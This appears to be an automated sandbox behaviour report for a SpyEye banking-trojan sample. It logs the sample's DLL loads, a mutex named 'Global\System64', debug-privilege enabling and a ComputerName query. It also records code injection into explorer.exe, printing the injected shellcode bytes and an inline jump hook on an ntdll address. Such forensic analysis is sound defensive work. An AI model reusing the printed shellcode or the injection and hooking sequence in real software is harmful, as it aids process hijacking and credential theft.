C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 1 4027F3
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 40282F
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1 402871
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1 4028FC
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 4 4027D4
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\crypt32.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\msimg32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\wininet.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\winmm.dll write and read and execute unknown 330000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 950000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 950000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 950000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3B0000 4096 own pid readonly success or wait 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\ntdll.dll query and read commit BD0000 65536 own pid readonly success or wait 1 402BE4
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1 BD0897
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\System64 success or wait 61 40347C
\BaseNamedObjects\Global\System64 object name exists 1 40347C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 1 404F44
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 0 404F44
Thread Activities:
+ Thread delayed
TID Delay Completion Count Source Address
13924 3s success or wait 1 404E03
13924 0s success or wait 1 404E25
13924 0s success or wait 60 404E71
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 1820000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 404DD4
1636 C:\WINDOWS\explorer.exe 7C90CFEE 5 E9 BF 33 F1 84 success or wait 1 4041FF
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 3E0000 12FFA0 page execute and read and write success or wait 1 40FA57
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe BD0000 12F610 page execute and read and write success or wait 1 3E1A32
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe BF0000 12F610 page execute and read and write success or wait 1 3E2B0E
1636 C:\WINDOWS\explorer.exe 1820000 12FBEC page execute and read and write success or wait 1 404DD4
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page read and write page readonly success or wait 1 4611FF
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page readonly page read and write success or wait 1 461214
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 63000 page execute and read and write page readonly success or wait 1 3E0852
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 401000 3E000 page execute and read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 43F000 18000 page execute and read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 457000 1000 page read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page read and write page execute and read and write success or wait 1 456796
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page execute and read and write page read and write success or wait 1 4567AB
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe C55FA8 1000 page execute and read and write page execute read success or wait 3 40375F
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 44E15C 1000 page execute and read and write page execute and read and write success or wait 1 404A59
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 451D90 2000 page execute and read and write page execute and read and write success or wait 1 404AB9
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 44FD90 3000 page execute and read and write page execute and read and write success or wait 1 404C36
1636 C:\WINDOWS\explorer.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 4041FF
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 404C74
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 2 BD0154
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1963542214
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1963545975
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1963565485
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1963566949
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1963568449
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1963569212
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1963570679
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1963571039
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1963573324
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1963576368
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1963580338
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1963586293
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1963588411
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1963591332
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1963600423
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1963605677
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1963609800
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1963615261
Section loaded Path: \KnownDlls\crypt32.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 1963625070
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1963626617
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1963632571
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1963634169
Section loaded Path: \KnownDlls\msimg32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 1963644687
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 1963646243
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1963651563
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1963661611
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1963665103
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1963675994
Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1963683901
Section loaded Path: \KnownDlls\wininet.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1963687153
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1963693122
Section loaded Path: \KnownDlls\winmm.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 1963701713
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 1963703269
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1963721322
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1963723826
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1963725906
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1963738747
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 950000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1963742377
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 950000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1963762146
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 950000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1963820248
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1963822822
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1963832817
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1963835750
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1963838005
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 1964107527
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 1964117733
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 3E0000 Length: 12FFA0 Allocation Type: null Protection: page execute and read and write success or wait 1964163457
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 63000 New Protection: page execute and read and write New Protection: page readonly success or wait 1964188363
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: BD0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 1964190435
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: BF0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 1964191349
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 401000 Length: 3E000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1967640530
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 43F000 Length: 18000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1967642122
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 457000 Length: 1000 New Protection: page read and write New Protection: page execute and read and write success or wait 1967642489
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page execute and read and write success or wait 1967670996
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page execute and read and write New Protection: page read and write success or wait 1967672022
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967672391
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967672739
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1967673073
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 44E15C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1967673300
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967673564
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967673869
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1967674170
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 451D90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1967674369
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName Name: ComputerName success or wait 1967675080
Privilege adjusted Privilege: Debug On or off: on success or wait 1967679532
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1967680069
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1967683503
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967683769
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967684120
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1967684404
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 44FD90 Length: 3000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1967684631
System info queried Type: ProcessInformation success or wait 1967684845
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 1967690208
Privilege adjusted Privilege: Debug On or off: on success or wait 1967690745
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1820000 Length: 12FBEC Allocation Type: null Protection: page execute and read and write success or wait 1972168808
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 1972169199
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972169543
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 1972169631
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972169865
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1972169955
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1972170064
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972170281
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1972170371
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972171078
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 1972171201
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1820000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1972196716
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 1972196884
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 F1 84 success or wait 1972217434
Thread delayed Time: 3 TID: 13924 success or wait 1972222192
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1982957132
Thread delayed Time: 0 TID: 13924 success or wait 1982957517
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1984752853
Thread delayed Time: 0 TID: 13924 success or wait 1984753242
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985140284
Thread delayed Time: 0 TID: 13924 success or wait 1985140744
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985529911
Thread delayed Time: 0 TID: 13924 success or wait 1985532047
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985921342
Thread delayed Time: 0 TID: 13924 success or wait 1985921717
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1986333554
Thread delayed Time: 0 TID: 13924 success or wait 1986333923
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1986704786
Thread delayed Time: 0 TID: 13924 success or wait 1986705201
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987129729
Thread delayed Time: 0 TID: 13924 success or wait 1987130118
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987493279
Thread delayed Time: 0 TID: 13924 success or wait 1987497198
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987878867
Thread delayed Time: 0 TID: 13924 success or wait 1987879321
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1988285980
Thread delayed Time: 0 TID: 13924 success or wait 1988287199
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1988664721
Thread delayed Time: 0 TID: 13924 success or wait 1988665096
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989056339
Thread delayed Time: 0 TID: 13924 success or wait 1989056710
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989447882
Thread delayed Time: 0 TID: 13924 success or wait 1989448253
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989836596
Thread delayed Time: 0 TID: 13924 success or wait 1989837055
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1990230838
Thread delayed Time: 0 TID: 13924 success or wait 1990231292
